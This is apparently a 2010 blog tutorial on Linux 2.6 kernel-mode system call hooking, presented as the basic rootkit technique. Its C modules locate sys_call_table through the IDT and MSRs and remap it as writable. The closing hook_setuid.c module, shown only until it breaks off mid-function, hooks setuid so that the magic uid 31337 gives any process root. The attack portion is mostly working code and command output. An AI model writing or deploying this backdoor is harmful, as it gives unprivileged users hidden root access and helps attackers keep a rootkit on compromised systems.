Ninjas OWN Pirates :> ----+----------------------------------------------------------------------------------------------+ | Home Articles Tools Links About | ----+----------------------------------------------------------------------------------------------+ ,_._._._._._._._|____________________________________________________ |_X_X_X_X_X_X_X_| Kernel mode hooking [EN] / ! Kernel Mode Hooking - oblique 2010 0x01] Introduction 0x02] Kernel mode hooking basic theory 0x03] LKM - hello kernel 0x04] Interrupt Descriptor Table (IDT) 0x05] Get sys_call_table - Linux x86-32 0x06] Model-Specific Registers (MSRs) 0x07] Get sys_call_table - Linux x86-64 0x08] Get ia32_sys_call_table - Linux x86-64 0x09] Map to a writable memory 0x0A] Hook a system call 0x0B] Other ideas/methods 0x0C] Greets 0x0D] References --[ 0x01 Introduction In this article I will show you the basic technique that rootkits use, which we can use to hook system calls in kernel mode. I will deal only with Linux 2.6 x86-32 and Linux 2.6 x86-64. In the end we are going to hook the setuid system call which when takes a "magic" uid as an argument it will give root to the process. --[ 0x02 Kernel mode hooking basic theory The modern Operating Systems that work in x86 architecture, use the well-known protected mode. In protected mode there are 4 different privilege levels, 0 to 3 (a.k.a ring0 - ring3). The highest-level (the least privileged) is the userland (ring3) and the lowest-level (the highest privileged) is the kernel mode (ring0). Applications run in userland and they use an interrupt to tell to the kernel which system call have to execute. This interrupt in Linux x86-32 is the instruction "int $0x80" and in Linux x86-64 is the instruction "syscall". When the CPU takes the interrupt, it switch from ring3 to ring0 and it calls the system_call. Lets see the source code for x86-32: arch/x86/kernel/entry_32.S from [5] ... ... ENTRY(system_call) RING0_INT_FRAME pushl %eax CFI_ADJUST_CFA_OFFSET 4 SAVE_ALL GET_THREAD_INFO(%ebp) testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%ebp) jnz syscall_trace_entry cmpl $(nr_syscalls), %eax jae syscall_badsys syscall_call: call *sys_call_table(,%eax,4) movl %eax,PT_EAX(%esp) syscall_exit: LOCKDEP_SYS_EXIT DISABLE_INTERRUPTS(CLBR_ANY) TRACE_IRQS_OFF movl TI_flags(%ebp), %ecx testl $_TIF_ALLWORK_MASK, %ecx jne syscall_exit_work ... ... As you can see the instruction "call *sys_call_table(,%eax,4)" calls the system call from a pointer array (sys_call_table) based on EAX value. This values can be found at /usr/include/asm/unistd_32.h (for x86-32) and /usr/include/asm/unistd_64.h (for x86-64). The same thing happens at x86-64 but there, there is one more array, the ia32_sys_call_table which is used in ia32_syscall. This is used for 32bit binary emulator. To hook a system call we have to change its pointer from sys_call_table with a pointer of another function that we have create which will call the real pointer (if its needed). This cannot be done with a userland program because it doesn't have access to the kernel memory (actually you can, via /dev/kmem or /dev/mem), so we will use Loadable Kernel Module (LKM) to write kernel mode programs. Many people know LKM as a hardware driver which can be loaded from shell through the commands modprobe or insmod. In fact LKM is a module that is loaded in kernel memory and after that, it becomes part of the kernel. In kernel 2.4 hooking is very easy because sys_call_table is exported, so with "extern void *sys_call_table[];" you can get it and write to it. Unlike 2.4, in kernel 2.6 the sys_call_table is not exported and after 2.6.16-rc1 is read-only. There are solutions for these 2 problems, also there are 2 different ways to get the address of sys_call_table which we are going to examine later. --[ 0x03 LKM - hello kernel Before I continue I will show how we can write and compile an LKM (if you know how to do this just skip this section). An LKM does not have main() but has other 2 functions. The init_module() which is called when we load the module and the cleanup_module() which is called when we (or the kernel) unload the module. The init_module() returns int, if the int is negative number then the module will not be loaded and an error is returned, if the int value is 0 then the module has been loaded successfully. The functions which does not take arguments must have void in parenthesis because of some programming style standards. Another standard is that with the macro MODULE_LICENSE() we have to declare the license of the module (more info: http://kerneltrap.org/node/2991). --file: hello_kernel.c-- #include <linux/module.h> int init_module(void) { printk(KERN_INFO "Hello kernel!"); return 0; } void cleanup_module(void) { printk(KERN_INFO "Bye bye kernel!"); } MODULE_LICENSE("GPL"); --EOF-- In kernel 2.6 there is one more way to declare the init and cleanup functions and we can use any name we want. init function declaration: static int __init name_1(void) { } cleanup function declaration: static void __exit name_2(void) { } and then we do this: module_init(name_1); module_exit(name_2); A second example of hello_kernel.c: --file: hello_kernel.c-- #include <linux/module.h> static int __init hello_init(void) { printk(KERN_INFO "Hello kernel!"); return 0; } static void __exit hello_exit(void) { printk(KERN_INFO "Bye bye kernel!"); } module_init(hello_init); module_exit(hello_exit); MODULE_LICENSE("GPL"); --EOF-- Kernel uses printk() to print a message. printk() has the same syntax as printf() but first we have to define the type of the message. The available types are: KERN_EMERG, KERN_ALERT, KERN_CRIT, KERN_ERR, KERN_WARNING, KERN_NOTICE, KERN_INFO, KERN_DEBUG, KERN_DEFAULT, KERN_CONT. To see these messages we have to run the command 'dmesg' (more info: 'man dmesg'). To compile a module in kernel 2.6 we have to create a Makefile which should have the variable obj-m. In obj-m we have to declare the modules names but with .o extension. In our case is hello_kernel.o --file: Makefile-- obj-m = hello_kernel.o KDIR = /lib/modules/$(shell uname -r)/build all: make -C $(KDIR) M=$(PWD) modules clean: make -C $(KDIR) M=$(PWD) clean --EOF-- (more info: Documentation/kbuild/modules.txt from [5]) -- NOTE -- Don't forget that the basic syntax of Makefile is: <target>: [ <dependency > ]* [ <TAB> <command> <endl> ]+ So in 5th and 7th line we must have Tabs instead of spaces before "make". If you run 'make' and you got an error, check for this. -- END OF NOTE -- After the creation of Makefile we have to run 'make' to compile the module. Then we run as root 'insmod hello_kernel.ko' to load it and 'rmmod hello_kernel' to unload it. oblique@gentoo ~/hello_kernel $ ls hello_kernel.c Makefile oblique@gentoo ~/hello_kernel $ make make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hello_kernel modules make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2' CC [M] /home/oblique/hello_kernel/hello_kernel.o Building modules, stage 2. MODPOST 1 modules CC /home/oblique/hello_kernel/hello_kernel.mod.o LD [M] /home/oblique/hello_kernel/hello_kernel.ko make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2' oblique@gentoo ~/hello_kernel $ sudo insmod hello_kernel.ko oblique@gentoo ~/hello_kernel $ dmesg ... ... [60947.072113] Hello kernel! oblique@gentoo ~/hello_kernel $ sudo rmmod hello_kernel oblique@gentoo ~/hello_kernel $ dmesg ... ... [60947.072113] Hello kernel! [61105.613280] Bye bye kernel! oblique@gentoo ~/hello_kernel $ --[ 0x04 Interrupt Descriptor Table (IDT) IDT is a table in x86 architecture which can have up to 256 entries for 3 gate types (task gate, interrupt gate, trap gate). The "int $0x80" is interrupt gate. This table actually is stored in kernel memory and the kernel just loads its address to IDT Register (IDTR) with the instruction LIDT. We can read this register using the instruction SIDT which takes as destination operand a memory address. IDTR structure is: x86-32: BYTES NAMES 2 limit 4 base x86-64: BYTES NAMES 2 limit 8 base base is the address where the IDT stars and by adding the limit to it, we will get the table's last memory address. We can express ITDR with this C struct: struct idtr { unsigned short limit; void *base; } __attribute__ ((packed)); -- NOTE -- The "__attribute__ ((packed));" tells the gcc to use the minimum amount of memory required by the chosen type. In other words it will create a struct that is exactly the bytes we want. -- END OF NOTE -- Now we know that IDT address is base and has 3 gates. The descriptor of IDT has this strcture: x86-32: BYTES NAMES 2 offset low bits (0..15) 2 segment selector 1 zero 1 type & flags 2 offset high bits (16..31) struct idt_descriptor { unsigned short offset_low; unsigned short selector; unsigned char zero; unsigned char type_flags; unsigned short offset_high; } __attribute__ ((packed)); In type_flags there is the type of gate with same flags. From this struct we will only need offset_low and offset_high. To get the offset we have to write the following: offset = (offset_high<<16) | offset_low x86-64: BYTES NAMES 2 offset low bits (0..15) 2 segment selector 1 zero 1 type & flags 2 offset middle bits (16..31) 4 offset high bits (32..63) 4 zero struct idt_descriptor { unsigned short offset_low; unsigned short selector; unsigned char zero1; unsigned char type_flags; unsigned short offset_middle; unsigned int offset_high; unsigned int zero2; } __attribute__ ((packed)); Only offset_low, offset_middle and offset_high are needed here. Code below gets the offset: offset = (offset_high<<32) | (offset_middle<<16) | offset_low --[ 0x05 Get sys_call_table - Linux x86-32 There are 2 ways to obtain the sys_call_table: 1) from some files (/boot/System.map-(kernel_version), vmlinux, /proc/kallsyms) but maybe these files doesn't even exist. 2) from IDT descriptor of interrupt 0x80. Method 1: oblique@gentoo ~ $ grep sys_call_table /boot/System.map-`uname -r` c1582160 R sys_call_table oblique@gentoo ~ $ nm /usr/src/linux/vmlinux | grep sys_call_table c1582160 R sys_call_table oblique@gentoo ~ $ grep sys_call_table /proc/kallsyms oblique@gentoo ~ $ grep system_call /proc/kallsyms c157fac4 T system_call -- NOTE -- /usr/src/linux is the path of your kernel source. Also the addresses we got differ from system to system. -- END OF NOTE -- As we can see with the first 2 commands we got the address of sys_call_table. File /proc/kallsyms doesn't contain it, but has the system_call. Lets check system_call with gdb. oblique@gentoo ~ $ gdb -q /usr/src/linux/vmlinux Reading symbols from /usr/src/linux-2.6.34-zen1-r2/vmlinux...done. (gdb) x/30i 0xc157fac4 0xc157fac4: push %eax 0xc157fac5: cld 0xc157fac6: push $0x0 0xc157fac8: push %fs 0xc157faca: push %es 0xc157facb: push %ds 0xc157facc: push %eax 0xc157facd: push %ebp 0xc157face: push %edi 0xc157facf: push %esi 0xc157fad0: push %edx 0xc157fad1: push %ecx 0xc157fad2: push %ebx 0xc157fad3: mov $0x7b,%edx 0xc157fad8: mov %edx,%ds 0xc157fada: mov %edx,%es 0xc157fadc: mov $0xd8,%edx 0xc157fae1: mov %edx,%fs 0xc157fae3: mov $0xffffe000,%ebp 0xc157fae8: and %esp,%ebp 0xc157faea: testl $0x100001d1,0x8(%ebp) 0xc157faf1: jne 0xc157fbd8 0xc157faf7: cmp $0x152,%eax 0xc157fafc: jae 0xc157fc21 0xc157fb02: call *-0x3ea7dea0(,%eax,4) 0xc157fb09: mov %eax,0x18(%esp) 0xc157fb0d: cli 0xc157fb0e: mov 0x8(%ebp),%ecx 0xc157fb11: test $0x1000feff,%ecx 0xc157fb17: jne 0xc157fbf8 Here we can see the first 30 instructions of system_call (0xc157fac4). As I have shown before, there is a call that executes the system call from sys_call_table. This call is at address 0xc157fb02 and the next instruction is at 0xc157fb09. So 0xc157fb09 - 0xc157fb02 = 7 bytes. (gdb) x/7xb 0xc157fb02 0xc157fb02: 0xff 0x14 0x85 0x60 0x21 0x58 0xc1 The first 3 bytes are the opcodes of the instruction and the address of sys_call_table follows. (gdb) x/xw 0xc157fb02 + 3 0xc157fb05: 0xc1582160 So now we found the address of sys_call_table. I will not implement this method because I prefer the second. Method 2: As you should already know the interrupts are inside IDT. When we call the instruction "int $0x80" the CPU goes to the IDT and takes the IDT descriptor of interrupt 0x80 and then it jumps to the offset representing the address of system_call. So from the offset we can search for the pattern 0xff 0x14 0x85 and when we find it the next 4 bytes is the address of sys_call_table. --file: get_sct.c-- #include <linux/module.h> struct idt_descriptor { unsigned short offset_low; unsigned short selector; unsigned char zero; unsigned char type_flags; unsigned short offset_high; } __attribute__ ((packed)); struct idtr { unsigned short limit; void *base; } __attribute__ ((packed)); void *get_sys_call_table(void) { struct idtr idtr; struct idt_descriptor idtd; void *system_call; unsigned char *ptr; int i; asm volatile("sidt %0" : "=m"(idtr)); memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd)); system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low); printk(KERN_INFO "system_call: 0x%p", system_call); for (ptr=system_call, i=0; i<500; i++) { if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85) return *((void**)(ptr+3)); ptr++; } return NULL; } static int __init sct_init(void) { printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table()); return 0; } static void __exit sct_exit(void) { } module_init(sct_init); module_exit(sct_exit); MODULE_LICENSE("GPL"); --EOF-- Explanation: asm volatile("sidt %0" : "=m"(idtr)); memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd)); Here we get the IDTR and then with 'base + 0x80*sizeof(idtd)' we read the IDT descriptor of interrupt 0x80. system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low); for (ptr=system_call, i=0; i<500; i++) { if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85) return *((void**)(ptr+3)); ptr++; } Here we calculate the address of system_call and then with loop we check for the pattern. After we find it we add 3 and we return what the new address holds. oblique@gentoo ~/hooking $ make make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2' CC [M] /home/oblique/hooking/get_sct.o Building modules, stage 2. MODPOST 1 modules CC /home/oblique/hooking/get_sct.mod.o LD [M] /home/oblique/hooking/get_sct.ko make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2' oblique@gentoo ~/hooking $ sudo insmod get_sct.ko oblique@gentoo ~/hooking $ dmesg | tail ... ... [70274.087185] system_call: 0xc157fac4 [70274.087190] sys_call_table: 0xc1582160 oblique@gentoo ~/hooking $ sudo rmmod get_sct --[ 0x06 Model-Specific Registers (MSRs) MSRs are registers that are used for very specific CPU jobs. To write to MSRs we use the instruction WRMSR and to read we use the instruction RDMSR. These 2 instructions use 3 registers: EDX, EAX, ECX. ECX should carry the value of the MSR we want to use. MSRs are 64bit registers, we use EDX for the high bits and EAX for the low bits. The values that we put in ECX can be found at [8]. --[ 0x07 Get sys_call_table - Linux x86-64 Instruction SYSCALL is used to call x86-64 system calls and it uses the IA32_LSTAR MSR. According to [8] the IA32_LSTAR value is 0xc0000082. The IA32_LSTAR MSR in fact holds the address of system_call. arch/x86/kernel/entry_64.S from [5] ... ... ENTRY(system_call) CFI_STARTPROC simple CFI_SIGNAL_FRAME CFI_DEF_CFA rsp,KERNEL_STACK_OFFSET CFI_REGISTER rip,rcx SWAPGS_UNSAFE_STACK ENTRY(system_call_after_swapgs) movq %rsp,PER_CPU_VAR(old_rsp) movq PER_CPU_VAR(kernel_stack),%rsp ENABLE_INTERRUPTS(CLBR_NONE) SAVE_ARGS 8,1 movq %rax,ORIG_RAX-ARGOFFSET(%rsp) movq %rcx,RIP-ARGOFFSET(%rsp) CFI_REL_OFFSET rip,RIP-ARGOFFSET GET_THREAD_INFO(%rcx) testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%rcx) jnz tracesys system_call_fastpath: cmpq $__NR_syscall_max,%rax ja badsys movq %r10,%rcx call *sys_call_table(,%rax,8) movq %rax,RAX-ARGOFFSET(%rsp) ret_from_sys_call: ... ... The "call *sys_call_table(,%rax,8)" calls the system call. Lets see system_call in gdb. oblique@sandbox64:~$ grep sys_call_table /boot/System.map-`uname -r` ffffffff81544380 R sys_call_table ffffffff8154dff8 r ia32_sys_call_table oblique@sandbox64:~$ grep system_call /boot/System.map-`uname -r` ffffffff81012060 T system_call ffffffff81012070 T system_call_after_swapgs ffffffff810120dc t system_call_fastpath oblique@sandbox64:~$ gdb -q /usr/src/linux/vmlinux Reading symbols from /usr/src/linux-2.6.32/vmlinux...done. (gdb) x/30i 0xffffffff81012060 0xffffffff81012060: swapgs 0xffffffff81012063: data32 data32 data32 nopw %cs:0x0(%rax,%rax,1) 0xffffffff81012070: mov %rsp,%gs:0xc6c8 0xffffffff81012079: mov %gs:0xcbc8,%rsp 0xffffffff81012082: push %rax 0xffffffff81012083: callq *0x790a0f(%rip) # 0xffffffff817a2a98 0xffffffff81012089: pop %rax 0xffffffff8101208a: sub $0x50,%rsp 0xffffffff8101208e: mov %rdi,0x40(%rsp) 0xffffffff81012093: mov %rsi,0x38(%rsp) 0xffffffff81012098: mov %rdx,0x30(%rsp) 0xffffffff8101209d: mov %rax,0x20(%rsp) 0xffffffff810120a2: mov %r8,0x18(%rsp) 0xffffffff810120a7: mov %r9,0x10(%rsp) 0xffffffff810120ac: mov %r10,0x8(%rsp) 0xffffffff810120b1: mov %r11,(%rsp) 0xffffffff810120b5: mov %rax,0x48(%rsp) 0xffffffff810120ba: mov %rcx,0x50(%rsp) 0xffffffff810120bf: mov %gs:0xcbc8,%rcx 0xffffffff810120c8: sub $0x1fd8,%rcx 0xffffffff810120cf: testl $0x100001d1,0x10(%rcx) 0xffffffff810120d6: jne 0xffffffff8101222c 0xffffffff810120dc: cmp $0x12a,%rax 0xffffffff810120e2: ja 0xffffffff810121b6 0xffffffff810120e8: mov %r10,%rcx 0xffffffff810120eb: callq *-0x7eabbc80(,%rax,8) 0xffffffff810120f2: mov %rax,0x20(%rsp) 0xffffffff810120f7: mov $0x1000feff,%edi 0xffffffff810120fc: mov %gs:0xcbc8,%rcx 0xffffffff81012105: sub $0x1fd8,%rcx The instruction that we looking for is at 0xffffffff810120eb and it's 7 bytes. (gdb) x/7xb 0xffffffff810120eb 0xffffffff810120eb: 0xff 0x14 0xc5 0x80 0x43 0x54 0x81 (gdb) x/xw 0xffffffff810120eb + 3 0xffffffff810120ee: 0x81544380 As you can see we have the sys_call_table address but it needs 0xffffffff as high bits. The pattern that we are looking for is not the same as x86-32, now the pattern is 0xff 0x14 0xc5. --file: get_sct64.c-- #include <linux/module.h> #define IA32_LSTAR 0xc0000082 void *get_sys_call_table(void) { void *system_call; unsigned char *ptr; int i, low, high; asm("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR)); system_call = (void*)(((long)high<<32) | low); printk(KERN_INFO "system_call: 0x%p", system_call); for (ptr=system_call, i=0; i<500; i++) { if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5) return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3))); ptr++; } return NULL; } static int __init sct_init(void) { printk(KERN_INFO "sys_call_table: 0x%p", get_sys_call_table()); return 0; } static void __exit sct_exit(void) { } module_init(sct_init); module_exit(sct_exit); MODULE_LICENSE("GPL"); --EOF-- oblique@sandbox64:~/hooking$ sudo insmod get_sct641.ko oblique@sandbox64:~/hooking$ dmesg | tail ... ... [ 3027.560110] system_call: 0xffffffff81012060 [ 3027.560110] sys_call_table: 0xffffffff81544380 oblique@sandbox64:~/hooking$ sudo rmmod get_sct641 --[ 0x08 Get ia32_sys_call_table - Linux x86-64 x86-32 binaries as we know use interrupt 0x80 to call system calls, so for being the kernel able to run x86-32 binaries, kernel developers created the ia32_syscall which calls the system call from ia32_sys_call_table. As we saw above the interrupts are defined in IDT, so we already know the technique to get ia32_sys_call_table. ia32_syscall uses the "call *ia32_sys_call_table(,%rax,8)" to call a system call and the pattern that we are looking for is 0xff 0x14 0xc5. --file: get_ia32_sct64.c-- #include <linux/module.h> struct idt_descriptor { unsigned short offset_low; unsigned short selector; unsigned char zero1; unsigned char type_flags; unsigned short offset_middle; unsigned int offset_high; unsigned int zero2; } __attribute__ ((packed)); struct idtr { unsigned short limit; void *base; } __attribute__ ((packed)); void *get_ia32_sys_call_table(void) { struct idtr idtr; struct idt_descriptor idtd; void *ia32_syscall; unsigned char *ptr; int i; asm volatile("sidt %0" : "=m"(idtr)); memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd)); ia32_syscall = (void*)(((long)idtd.offset_high<<32) | (idtd.offset_middle<<16) | idtd.offset_low); printk(KERN_INFO "ia32_syscall: 0x%p", ia32_syscall); for (ptr=ia32_syscall, i=0; i<500; i++) { if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5) return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3))); ptr++; } return NULL; } static int __init sct_init(void) { printk(KERN_INFO "ia32_sys_call_table: 0x%p", get_ia32_sys_call_table()); return 0; } static void __exit sct_exit(void) { } module_init(sct_init); module_exit(sct_exit); MODULE_LICENSE("GPL"); --EOF-- oblique@sandbox64:~/hooking$ grep ia32_syscall /boot/System.map-`uname -r` ffffffff810464e0 T ia32_syscall ffffffff8154ea80 r ia32_syscall_end oblique@sandbox64:~/hooking$ grep ia32_sys_call_table /boot/System.map-`uname -r` ffffffff8154dff8 r ia32_sys_call_table oblique@sandbox64:~/hooking$ sudo insmod get_ia32_sct64.ko oblique@sandbox64:~/hooking$ dmesg | tail ... ... [ 5786.380128] ia32_syscall: 0xffffffff810464e0 [ 5786.380128] ia32_sys_call_table: 0xffffffff8154dff8 oblique@sandbox64:~/hooking$ sudo rmmod get_ia32_sct64 --[ 0x09 Map to a writable memory As I have said in section 0x02, sys_call_table is read-only. This also happens for other parts of kernel memory. The solution is to use vmap(). void *vmap(struct page **pages, unsigned int count, unsigned long flags, pgprot_t prot); As we can see, vmap takes 4 arguments. The 1st argument is a pointers array, pointing to some 'struct page', 2nd is the number of pages, 3rd argument is about flags and 4th describes the memory protections. Virtual memory is separated into pages, sized 4096 bytes each (we can get that with PAGE_SIZE). If we are at the beginning of a page, the page address will have zero in a range from 0 to 12 bits. If we are not, then we can get the original address by performing a bitwise add operation with PAGE_MASK. To transform a virtual address to a page address we use virt_to_page() macro. A virtual address does belong to the same page with another one, only if they differ at 0..12 bits. According to [6] virt_to_page() was broken at x86-64 architecture and it was fixed in version 2.6.22. In this case we will need to use the "pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);" (addr will be the variable with our address). Now, we will need some preprocessors, if __i386__ is defined it means that compilation takes place in a x86-32 system, or if __x86_64__ is defined means that compilation takes place in a x86-64 system. LINUX_VERSION_CODE contains the numeric value of kernel version, and with KERNEL_VERSION() macro we can get the value of any version we want, so we will need to include linux/version.h. For calling vmap we have to include linux/vmalloc.h and linux/mm.h. The 1st argument we pass consists of 2 page addresses because sys_call_table can be probably separated in 2 pieces, if one of its parts belongs to the next page. The 3rd argument is the flag VM_MAP which makes vmap "understand" that we gave it an array of pages for mapping. Finally, the 4th argument we pass is PAGE_KERNEL, which gives us the privileges for gaining writing access to memory. Vmap will return an address which is the beginning of the 1st page we asked for, and for accessing sys_call_table we need to add its offset to page. We can get this offset using offset_in_page() macro. Inside cleanup function we have to call vunmap() for un-mapping the pages. --function: get_writable_sct()-- void *get_writable_sct(void *sct_addr) { struct page *p[2]; void *sct; unsigned long addr = (unsigned long)sct_addr & PAGE_MASK; if (sct_addr == NULL) return NULL; #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__) p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT); p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT); #else p[0] = virt_to_page(addr); p[1] = virt_to_page(addr + PAGE_SIZE); #endif sct = vmap(p, 2, VM_MAP, PAGE_KERNEL); if (sct == NULL) return NULL; return sct + offset_in_page(sct_addr); } -- END OF FUNCTION -- -- EXAMPLE -- void **sys_call_table = get_writable_sct(get_sys_call_table()); // hook some system calls vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK)); -- END OF EXAMPLE -- --[ 0x0A Hook a system call To hook a system call, we should first store its real address and then replace it with the address of the function we created. The definitions of system calls functions are found inside "include/linux/syscalls.h" [5]. As an example take a look at setuid definition: asmlinkage long sys_setuid(uid_t uid); asmlinkage is a macro which says to gcc that the arguments will be passed through the stack and not through registers, in case of optimization. In our module, we will define the following: asmlinkage long (*real_setuid)(uid_t uid); The real_setuid is a pointer to a function. After that we create our function that it will call the real_setuid(). asmlinkage long hooked_setuid(uid_t uid) { return real_setuid(uid); } In case we include asm/unistd_32.h we are going to have system calls numbers for x86-32, or we can get the relevant numbers for x86-64 if we include asm/unistd_64.h. In older glibc versions these files were asm-i386/unistd.h and asm-x86_64/unistd.h. If we include asm/unistd.h, a preprocessor will decide which one to use. In these files, system calls definitions have __NR_ prefix. For example with __NR_setuid we will get setuid's number. For hooking setuid we should write the following: real_setuid = sys_call_table[__NR_setuid]; sys_call_table[__NR_setuid] = hooked_setuid; and while cleaning up for unhook we should do: sys_call_table[__NR_setuid] = real_setuid; When we want the module to work in both x86 architectures, we should use preprocessors. If CONFIG_IA32_EMULATION is defined it means that x86-32 system calls also work in x86-64 systems. The sys_call_table and the ia32_sys_call_table both contain the same addresses, but in different places. There is a little problem because in asm/unistd_32.h and asm/unistd_64.h, values have the same names, so we can't include them at the same time. A simple solution is to code a simple script which detects whether the architecture is x86-64 and copies asm/unistd_32.h (or asm-i386/unistd.h) in the same folder with our source code, as well as replacing the prefix __NR_ with __NR32_. --file: configure.sh-- #!/bin/sh if [ `uname -m` = x86_64 ]; then if [ -e /usr/include/asm/unistd_32.h ]; then sed -e 's/__NR_/__NR32_/g' /usr/include/asm/unistd_32.h > unistd_32.h else if [ -e /usr/include/asm-i386/unistd.h ]; then sed -e 's/__NR_/__NR32_/g' /usr/include/asm-i386/unistd.h > unistd_32.h else echo "asm/unistd_32.h and asm-386/unistd.h does not exist." fi fi fi --EOF-- Here we should include this: #ifdef CONFIG_IA32_EMULATION #include "unistd_32.h" #endif with that we will actually hook it: #ifdef CONFIG_IA32_EMULATION ia32_sys_call_table[__NR32_setuid] = hooked_setuid; #endif and with that unhook it: #ifdef CONFIG_IA32_EMULATION ia32_sys_call_table[__NR32_setuid] = real_setuid; #endif Notice: Sometimes when they change completely the implementation of a system call, because the precedent was deprecated, they don't change the values, but they add new ones. Indeed after some version of x86-32, setuid exists 2 times as sys_setuid16 and sys_setuid. sys_setuid16 has the number of __NR_setuid and sys_setuid the number of __NR_setuid32. In this case if we want, we can hook both and by making use of a preprocessor to add some code. I am not going to implement this, but I will show you the case we only want to hook sys_setuid. hook: #ifdef __NR_setuid32 real_setuid = sys_call_table[__NR_setuid32]; sys_call_table[__NR_setuid32] = hooked_setuid; #else real_setuid = sys_call_table[__NR_setuid]; sys_call_table[__NR_setuid] = hooked_setuid; #endif #ifdef CONFIG_IA32_EMULATION #ifdef __NR32_setuid32 ia32_sys_call_table[__NR32_setuid32] = hooked_setuid; #else ia32_sys_call_table[__NR32_setuid] = hooked_setuid; #endif #endif unhook: #ifdef __NR_setuid32 sys_call_table[__NR_setuid32] = real_setuid; #else sys_call_table[__NR_setuid] = real_setuid; #endif #ifdef CONFIG_IA32_EMULATION #ifdef __NR32_setuid32 ia32_sys_call_table[__NR32_setuid32] = real_setuid; #else ia32_sys_call_table[__NR32_setuid] = real_setuid; #endif #endif Before I provide you with the whole module's source code, let's make an interesting modification in hooked_setuid. A nice concept is, after we call setuid and give as uid parameter a "magic" number, to change process uid and gid to 0. In other words to give process root privileges. Inside kernel exist lots of data structures that can be changed in future versions if vulnerabilities are discovered or if they implemented in a better way. One of these is 'struct task_struct' where a lot of information about processes can be found. This struct contains 8 interesting variables: uid_t uid, euid, suid, fsuid; gid_t gid, egid, sgid, fsgid; When targeting the running process we use 'current' macro. For these 2 we need to include linux/sched.h. For giving root privileges to a process we should do the following: current->uid = current->euid = current->suid = current->fsuid = 0; current->gid = current->egid = current->sgid = current->fsgid = 0; return 0; This won't be functional for kernel 2.6.29 and above because the data structure and the generally the method which assigns new uid and gid to the process has changed. In the new method a new struct exists, the 'struct cred'. For changing uid and gid we should first call prepare_creds(), which returns a pointer to a newly created 'struct cred', and then we change the variables and we call commit_creds(). Finally we should return its results. struct cred *cred = prepare_creds(); cred->uid = cred->suid = cred->euid = cred->fsuid = 0; cred->gid = cred->sgid = cred->egid = cred->fsgid = 0; return commit_creds(cred); I strongly advice you to use kernel's git for understanding the kernel changes. (http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=tags) --file: hook_setuid.c-- #include <linux/module.h> #include <linux/version.h> #include <linux/vmalloc.h> #include <linux/mm.h> #include <linux/sched.h> #include <asm/unistd.h> #ifdef CONFIG_IA32_EMULATION #include "unistd_32.h" #endif #ifdef __i386__ struct idt_descriptor { unsigned short offset_low; unsigned short selector; unsigned char zero; unsigned char type_flags; unsigned short offset_high; } __attribute__ ((packed)); #elif defined(CONFIG_IA32_EMULATION) struct idt_descriptor { unsigned short offset_low; unsigned short selector; unsigned char zero1; unsigned char type_flags; unsigned short offset_middle; unsigned int offset_high; unsigned int zero2; } __attribute__ ((packed)); #endif struct idtr { unsigned short limit; void *base; } __attribute__ ((packed)); void **sys_call_table; #ifdef CONFIG_IA32_EMULATION void **ia32_sys_call_table; #endif asmlinkage long (*real_setuid)(uid_t uid); asmlinkage long hooked_setuid(uid_t uid) { if (uid == 31337) { #if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,29) struct cred *cred = prepare_creds(); cred->uid = cred->suid = cred->euid = cred->fsuid = 0; cred->gid = cred->sgid = cred->egid = cred->fsgid = 0; return commit_creds(cred); #else current->uid = current->euid = current->suid = current->fsuid = 0; current->gid = current->egid = current->sgid = current->fsgid = 0; return 0; #endif } return real_setuid(uid); } #if defined(__i386__) || defined(CONFIG_IA32_EMULATION) #ifdef __i386__ void *get_sys_call_table(void) { #elif defined(__x86_64__) void *get_ia32_sys_call_table(void) { #endif struct idtr idtr; struct idt_descriptor idtd; void *system_call; unsigned char *ptr; int i; asm volatile("sidt %0" : "=m"(idtr)); memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd)); #ifdef __i386__ system_call = (void*)((idtd.offset_high<<16) | idtd.offset_low); #elif defined(__x86_64__) system_call = (void*)(((long)idtd.offset_high<<32) | (idtd.offset_middle<<16) | idtd.offset_low); #endif for (ptr=system_call, i=0; i<500; i++) { #ifdef __i386__ if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85) return *((void**)(ptr+3)); #elif defined(__x86_64__) if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5) return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3))); #endif ptr++; } return NULL; } #endif #ifdef __x86_64__ #define IA32_LSTAR 0xc0000082 void *get_sys_call_table(void) { void *system_call; unsigned char *ptr; int i, low, high; asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR)); system_call = (void*)(((long)high<<32) | low); for (ptr=system_call, i=0; i<500; i++) { if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5) return (void*)(0xffffffff00000000 | *((unsigned int*)(ptr+3))); ptr++; } return NULL; } #endif void *get_writable_sct(void *sct_addr) { struct 